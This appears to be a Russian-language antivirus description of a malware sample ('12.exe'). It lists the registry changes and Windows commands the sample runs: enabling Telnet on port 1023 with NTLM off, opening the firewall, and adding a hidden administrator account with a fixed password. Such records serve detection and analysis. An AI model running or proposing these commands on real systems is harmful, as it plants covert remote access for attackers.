Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\system] 'Start' = '00000002'
- <Текущая директория>\12.exe
- <SYSTEM32>\net1.exe start telnet
- <SYSTEM32>\tlntadmn.exe config port=1023 sec=-NTLM
- <SYSTEM32>\reg.exe add HKLM\SYSTEM\ControlSet001\Services\TlntSvr /f /v Start /t REG_DWORD /d 2
- <SYSTEM32>\net1.exe start system
- <SYSTEM32>\netsh.exe firewall add portopening TCP 1023 telnet
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\sc.exe create system binpath= <SYSTEM32>\tlntsvr.exe type= own start= auto
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\mcdfndj.bat" "
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 12123 /add
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v SUPPORT_388945a0 /t REG_DWORD /d 0
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /delete
- <SYSTEM32>\net1.exe localgroup Администраторы SUPPORT_388945a0 /add
- <Текущая директория>\12.exe
- %TEMP%\1.tmp\mcdfndj.bat
- %TEMP%\1.tmp\mcdfndj.bat
- <Текущая директория>\12.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''